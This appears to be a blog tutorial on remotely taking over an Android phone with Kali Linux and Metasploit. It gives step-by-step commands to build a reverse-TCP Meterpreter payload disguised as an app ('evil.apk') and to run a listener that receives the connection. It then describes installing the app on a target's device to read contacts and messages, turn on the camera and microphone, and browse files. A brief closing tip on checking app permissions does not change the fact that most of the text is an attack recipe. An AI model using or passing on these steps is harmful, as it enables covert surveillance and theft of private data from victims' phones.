What will you need to hack an Android device remotely
1) A PC or Laptop running on Linux Operating System.2) Active Internet Connection.
3) An Android device to test the hack. That’s it!
Exploiting an Android Hacked Device with Kali Linux and Metasploit
By the end of this tutorial, one can perform the below hacks after successfully installing the deploy application on target device.Get contacts
Take a picture from the camera
Stream sound from microphone (or other sources..)
Get all messages
Streaming video (for activity based client only)
Access file manager and many more…
Hacking Android Device Remotely Using Kali Linux
Steps to Hack Android Device Remotely
When you are all set, carefully follow the below steps one by one.
step1: Open the terminal in Linux , type the below code and press enter.
:~# msfpayload android/meterpreter/reverse_tcp LHOST=youripaddress LPORT=anyport(8080 or 4444) R > evil.apk
If you don’t know your ip address, simply open another terminal and type “ifconfig” without quotes. You can see your ip address beside wlan0 it would be something like 192.168.x.x (Note: you need to do this only when you are connected to Internet).
Step2: Now the deploy application evil.apk will be automatically generated. You can find it in home folder.
Step3: Now open another terminal and type the below code.
> msfconsole
> use exploit/multi/handler
> set payload android/meterpreter/reverse_tcp
> set lhost 192.168.45.4 (the same ip address you entered in step1).
> set lport 8080 (the same port you used in step1).
> exploit
Now the console starts listening to 192.168.45.4 at port 8080.
Step5: Now all you need to do is, copy the evil.apk from home folder to the target device.
Step6: Install the evil.apk on the target device and when the device is connected to the internet open the app.
Step7: As soon as you open the app in the device, you can see the connected device in console terminal.
Step8: Now you have full access to the device from the terminal. Just type help and you will be given with all the available commands.
Congrats! you have successfully hacked an android device.
How to avoid these kind of apps:
From this tutorial you may have understood how easy it
is to hack android devices. So to protect your self from being hacked
you should check the app thoroughly before installing it. It is must to
check app permissions before installing because the app cannot do
anything without user’s permission.
Post a Comment
Positive site, where did u come up with the information on this posting?I have read a few of the articles on your website now, and I really like your style. Thanks a million and please keep up the effective work. linux fo hacking
Post a Comment